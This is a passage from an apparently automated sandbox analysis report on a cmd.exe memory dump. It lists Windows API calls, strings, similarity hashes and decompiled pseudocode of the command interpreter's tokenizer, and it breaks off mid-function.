0x001ce74a
0x001ce750
0x001ce750
0x001c45d2
0x001c45d2
0x001c45d2
0x001c45d7
0x00000000
0x001c45d9
0x001c45d9
0x00000000
0x001c45d9
0x001c45d7

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 001C4516
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 001C4523

Part of subcall function 001C465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,001C4533), ref: 001C4687
Part of subcall function 001C465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,001C4533), ref: 001C46A7

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 001C4538
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 001C4555
_setjmp3.MSVCRT ref: 001C45BD
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 001C45EE
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001E3840), ref: 001C45FF
exit.MSVCRT ref: 001C4625
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 001CE707
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001CE710

Part of subcall function 001C4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,001CD822,?,00000000,00000000), ref: 001C4770
Part of subcall function 001C4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,001CD822,?,00000000,00000000), ref: 001C478C

Part of subcall function 001C46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(001C458C), ref: 001C46D8
Part of subcall function 001C46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001E3840), ref: 001C46E9
Part of subcall function 001C46D8: memset.MSVCRT ref: 001C4703

Part of subcall function 001C3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(001E385C), ref: 001C3D4B
Part of subcall function 001C3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001C3D57
Part of subcall function 001C3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001C3D6B
Part of subcall function 001C3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001D6D90,00000001), ref: 001C3D78
Part of subcall function 001C3D27: _get_osfhandle.MSVCRT ref: 001C3D85
Part of subcall function 001C3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C3D8D
Part of subcall function 001C3D27: _get_osfhandle.MSVCRT ref: 001C3D99
Part of subcall function 001C3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001C3DA1
Part of subcall function 001C3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001C3DC7
Part of subcall function 001C3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001C3E02

_setjmp3.MSVCRT ref: 001CE785

Strings

Software\Policies\Microsoft\Windows\System, xrefs: 001C454B
DisableCMD, xrefs: 001CE6FF

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 4268540630-1920437939
Opcode ID: 9da6e92736663568362a167e0144ea61bd1293e196369dba624865286d3f14f1
Instruction ID: c0ff84022fd912698caf736116cacef37a945b8c5f3f4bde03f573638494cd66
Opcode Fuzzy Hash: 9da6e92736663568362a167e0144ea61bd1293e196369dba624865286d3f14f1
Instruction Fuzzy Hash: 0D71B570645345BBEB24BBB4AC99FBE77BCEB24314B14042EF512E65A1DB34C980C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 001BCFBC Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 141COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001DF830,00002000,?,?,?,?,?,001C373A,001B590A,00000000), ref: 001BCFDF
_wcsicmp.MSVCRT ref: 001BD005
_wcsicmp.MSVCRT ref: 001BD01B
_wcsicmp.MSVCRT ref: 001BD031
_wcsicmp.MSVCRT ref: 001BD047
_wcsicmp.MSVCRT ref: 001BD05D
_wcsicmp.MSVCRT ref: 001BD073
_wcsicmp.MSVCRT ref: 001BD085
_wcsicmp.MSVCRT ref: 001BD09B

Part of subcall function 001B96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001DF830,?,00002000), ref: 001B96CC
Part of subcall function 001B96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001B96E0
Part of subcall function 001B96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 001B96F4
Part of subcall function 001B96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001B9708

Strings

CMDCMDLINE, xrefs: 001BD041
HIGHESTNUMANODENUMBER, xrefs: 001BD095
DATE, xrefs: 001BD057
TIME, xrefs: 001BD06D
CMDEXTVERSION, xrefs: 001BD02B
ERRORLEVEL, xrefs: 001BD015
RANDOM, xrefs: 001BD07F
0rRwPH]w, xrefs: 001CB546

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
String ID: 0rRwPH]w$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 2447294730-1774765192
Opcode ID: 6979b3b29f0d3178f0372153c08c98a3612100a6bda73d6714da3de17c992c55
Instruction ID: 0f1d46f85d92b1a021955a6752e89bfa3157fe46b62f0301533703ca6f1d8259
Opcode Fuzzy Hash: 6979b3b29f0d3178f0372153c08c98a3612100a6bda73d6714da3de17c992c55
Instruction Fuzzy Hash: 1E31D43220C602ABE72C7735BC4AFFB6699EB46720F24402EF412D15D1EF31C502C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 001BF300 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E001BF300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0x1eb8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L001C82C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0x1ef984 != 0) {
						_push( *0x1eb8a0);
						E001C25D9(L"Ungetting: \'%s\'\n");
					}
					 *0x1eb8a4 =  *0x1eb8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0x1eb8a0 =  *0x1eb8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E001BF9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E001BF9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0x1b2102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0x1eb8a4;
							if(_t167 != 0x1e3890) {
								 *0x1eb8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E001BF9D5(_t175) & 0x0000ffff;
					if( *0x1dd5b4 != 0) {
						 *0x1dd5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E001BF9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0x1bf8c0; // 0x5050500
									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M001BF8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0x1dd548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E001BF9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E001BF9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E001BF9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E001BF9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E001BD7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E001BF9D5(_t176);
											}
										}
										L79:
										_t141 =  *0x1eb8a4;
										if(_t141 != 0x1e3890) {
											 *0x1eb8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
									_t184 = E001BF9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E001BF9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0x1b2102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0x1eb8a4;
									if((_t175 - 0x1e388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E001BD7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0x1eb8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0x1dd548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E001BF9D5(_t175) & 0x0000ffff;
						if( *0x1dd5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0x1bf958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M001BF940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0x1dd548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E001BF9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E001BF9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0x1b2102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0x1eb8a4;
										if((_t175 - 0x1e388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0x1eb8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0x1eb8a4;
							if( *0x1eb8a4 != 0x1e3890) {
								 *0x1eb8a4 =  *0x1eb8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E001BC5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0x1dd5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E001BF9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

0x001bf300
0x001bf300
0x001bf30b
0x001bf30d
0x001bf312
0x001bf315
0x001bf318
0x001bf31d
0x001bf322
0x001cc593
0x00000000
0x001cc593
0x001bf328
0x001bf32d
0x001bf432
0x001cc4dc
0x001cc4e7
0x001cc4ec
0x001bf43d
0x001bf44a
0x001bf333
0x001bf337
0x00000000
0x00000000
0x001bf33d
0x001bf345
0x001bf34a
0x001bf350
0x001bf352
0x001bf357
0x001bf35b
0x001bf361
0x001bf366
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf352
0x001bf357
0x001bf35b
0x001bf361
0x001bf364
0x001bf36d
0x001bf370
0x001bf744
0x001bf376
0x001bf376
0x001bf376
0x001bf37d
0x001bf383
0x001bf388
0x001bf6de
0x00000000
0x001bf6e4
0x00000000
0x001bf6e4
0x001bf6de
0x001bf38e
0x001bf38e
0x001bf398
0x001bf39d
0x001bf39d
0x00000000
0x001bf398
0x001bf352
0x001bf3a2
0x001bf3ae
0x001bf3b1
0x001cc4f4
0x001cc501
0x00000000
0x001cc507
0x001cc50c
0x00000000
0x001cc50c
0x00000000
0x001bf3b7
0x001bf3b7
0x001bf3b7
0x001bf3bd
0x001bf450
0x001bf48a
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf452
0x001bf452
0x001bf455
0x00000000
0x001bf457
0x001bf457
0x001bf45e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf465
0x001bf46b
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf46d
0x001bf470
0x001bf475
0x00000000
0x00000000
0x001bf485
0x001bf475
0x00000000
0x00000000
0x001bf7bb
0x00000000
0x001bf7c1
0x001bf7c8
0x00000000
0x001bf7ce
0x00000000
0x001bf7ce
0x001bf7c8
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf45e
0x001bf455
0x001bf3c3
0x001bf3c3
0x001bf3c3
0x001bf3c6
0x001bf3c9
0x001bf3cc
0x001bf3d2
0x001bf3d2
0x001bf3d5
0x001bf3d9
0x001bf3dc
0x001bf3de
0x001bf3e4
0x001bf3e9
0x001bf76d
0x001bf770
0x001bf773
0x001bf776
0x001bf778
0x001bf778
0x001bf3f3
0x001bf681
0x001bf688
0x001bf6c6
0x001bf6c9
0x001bf6cc
0x001bf6d4
0x001bf6d7
0x001bf6d7
0x001bf68a
0x001bf691
0x001bf739
0x00000000
0x00000000
0x00000000
0x001bf697
0x001bf697
0x001bf69b
0x001bf7d8
0x001bf7db
0x001bf7de
0x001bf7de
0x001bf7e1
0x001bf7e1
0x001bf7e1
0x001bf7e6
0x001bf7ea
0x001bf7f0
0x001bf7f3
0x001bf7f9
0x001bf803
0x001bf813
0x001bf819
0x001bf81c
0x001bf81f
0x001bf822
0x001bf822
0x001bf813
0x001bf6a1
0x001bf6a1
0x001bf6ab
0x001bf6b4
0x001bf6b4
0x00000000
0x001bf6ab
0x001bf417
0x001bf417
0x001bf419
0x00000000
0x001bf41f
0x001bf3f3
0x001bf48c
0x001bf490
0x001bf868
0x00000000
0x001bf86e
0x001bf873
0x001bf879
0x00000000
0x00000000
0x001bf882
0x00000000
0x001bf888
0x001cc519
0x001cc51f
0x00000000
0x001cc525
0x00000000
0x001cc525
0x001cc51f
0x001bf882
0x00000000
0x001bf496
0x001bf496
0x001bf49a
0x001bf780
0x001bf783
0x001bf783
0x001bf4a3
0x001bf4a6
0x001bf4ac
0x001bf4b1
0x00000000
0x00000000
0x001bf4ba
0x001bf74e
0x001bf4c0
0x001bf4c0
0x001bf4c0
0x001bf4c7
0x001bf4cd
0x001bf4d2
0x00000000
0x00000000
0x001bf4d2
0x001bf4d9
0x001bf4df
0x001bf4e4
0x001bf6e9
0x001bf6ff
0x001bf720
0x001bf720
0x001bf726
0x001bf78e
0x00000000
0x001bf794
0x00000000
0x001bf794
0x001bf728
0x001bf728
0x001bf72b
0x00000000
0x00000000
0x00000000
0x001bf731
0x001bf701
0x001bf701
0x001bf706
0x001bf709
0x001bf70f
0x001bf714
0x001bf890
0x001bf89c
0x00000000
0x001bf8a2
0x00000000
0x001bf8a2
0x001bf71a
0x001bf71a
0x001bf71a
0x00000000
0x001bf71a
0x001bf714
0x00000000
0x001bf6ff
0x001bf4e4
0x001bf490
0x001bf3bd
0x001bf4ea
0x001bf4ed
0x001bf4f0
0x001bf4f3
0x001bf4f8
0x001bf505
0x001bf507
0x001bf507
0x001bf516
0x001bf519
0x00000000
0x00000000
0x001bf51f
0x001bf51f
0x001bf525
0x001bf56d
0x00000000
0x001bf56f
0x001bf56f
0x001bf576
0x00000000
0x001bf57d
0x00000000
0x00000000
0x001bf6be
0x00000000
0x00000000
0x001bf82c
0x00000000
0x00000000
0x001bf796
0x001bf796
0x001bf79b
0x00000000
0x001bf7a1
0x001bf7a3
0x001bf580
0x001bf580
0x001bf583
0x001bf586
0x001bf588
0x00000000
0x001bf58a
0x00000000
0x001bf7a9
0x001bf7ad
0x00000000
0x001bf7b3
0x00000000
0x001bf7b3
0x001bf7ad
0x001bf7a3
0x00000000
0x00000000
0x001bf758
0x001bf75d
0x00000000
0x001bf763
0x001cc552
0x00000000
0x001cc558
0x001bf82f
0x001bf82f
0x001bf833
0x00000000
0x001bf839
0x00000000
0x001bf839
0x001bf833
0x001cc552
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf576
0x001bf52c
0x001bf52c
0x001bf52c
0x001bf533
0x001bf840
0x00000000
0x001bf846
0x001bf84b
0x001bf851
0x00000000
0x001bf857
0x001bf85a
0x00000000
0x001bf860
0x001cc562
0x001cc568
0x00000000
0x001cc56e
0x00000000
0x001cc56e
0x001cc568
0x001bf85a
0x001bf851
0x00000000
0x001bf539
0x001bf539
0x001bf53d
0x001bf671
0x001bf674
0x001bf674
0x001bf545
0x001bf58d
0x001bf593
0x001bf598
0x00000000
0x001bf59a
0x001bf59e
0x001bf667
0x001bf5a4
0x001bf5a4
0x001bf5a4
0x001bf5ab
0x001bf5b1
0x001bf5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf5b6
0x001bf547
0x001bf547
0x001bf548
0x001bf54e
0x001bf553
0x001bf5fb
0x001bf611
0x001bf641
0x001bf646
0x001bf64c
0x001bf657
0x001bf65c
0x00000000
0x001bf662
0x00000000
0x001bf662
0x00000000
0x00000000
0x00000000
0x001bf613
0x001bf613
0x001bf618
0x001bf61b
0x001bf621
0x001bf626
0x00000000
0x001bf628
0x001bf630
0x001bf636
0x001bf63b
0x00000000
0x00000000
0x00000000
0x00000000
0x001bf63b
0x001bf626
0x00000000
0x001bf559
0x001bf559
0x001bf55f
0x001bf5b8
0x001bf5b8
0x001bf561
0x001bf561
0x001bf564
0x001bf567
0x00000000
0x001bf567
0x001bf55f
0x001bf553
0x001bf545
0x001bf533
0x001bf5bb
0x001bf5be
0x001bf5c3
0x001bf5c6
0x001bf5c9
0x001bf5ce
0x001bf5d0
0x001bf5dc
0x001bf5de
0x001bf5de
0x001bf5dc
0x001bf5e7
0x001cc57b
0x001cc58b
0x00000000
0x001cc590
0x001cc57b
0x001bf5f8
0x00000000
0x001cc52a
0x001cc52e
0x001cc538
0x00000000
0x001cc53e
0x001cc543
0x00000000
0x001cc543
0x00000000
0x001cc538
0x001bf507
0x00000000

APIs

_setjmp3.MSVCRT ref: 001BF318
iswspace.MSVCRT ref: 001BF35B
wcschr.MSVCRT ref: 001BF37D
iswdigit.MSVCRT ref: 001BF3DE
iswspace.MSVCRT ref: 001BF4A6
wcschr.MSVCRT ref: 001BF4C7
iswdigit.MSVCRT ref: 001BF4D9
iswdigit.MSVCRT ref: 001BF548
iswspace.MSVCRT ref: 001BF58D
wcschr.MSVCRT ref: 001BF5AB
iswspace.MSVCRT ref: 001BF61B
wcschr.MSVCRT ref: 001BF630
iswspace.MSVCRT ref: 001BF709

Strings

Ungetting: '%s', xrefs: 001CC4E2
=,;, xrefs: 001BF376, 001BF37C, 001BF4C0, 001BF4C6, 001BF5A4, 001BF5AA, 001BF7F9
()|&=,;", xrefs: 001BF62B, 001BF890

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: iswspace$wcschr$iswdigit$_setjmp3
String ID: ()|&=,;"$=,;$Ungetting: '%s'
API String ID: 1805751789-2755026540
Opcode ID: 7c6c07948f4bea5701faa0e7c160b25e66d995bd503fb1f97b48c6dfffe5987b
Instruction ID: 53d93beb4dc667f1915bffd14c34dd38bfe46c0886ce1ff0f6587f82f98fd288
Opcode Fuzzy Hash: 7c6c07948f4bea5701faa0e7c160b25e66d995bd503fb1f97b48c6dfffe5987b
Instruction Fuzzy Hash: 8FE1DDB5A002059ACB349F69AD897FA77A4AF24354F28003EFC45DB6A1E734CD93C752

Uniqueness

Uniqueness Score: -1.00%

Function 001D9583 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E001D9583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0x1dd0b4; // 0xea614d48
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E001BB3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
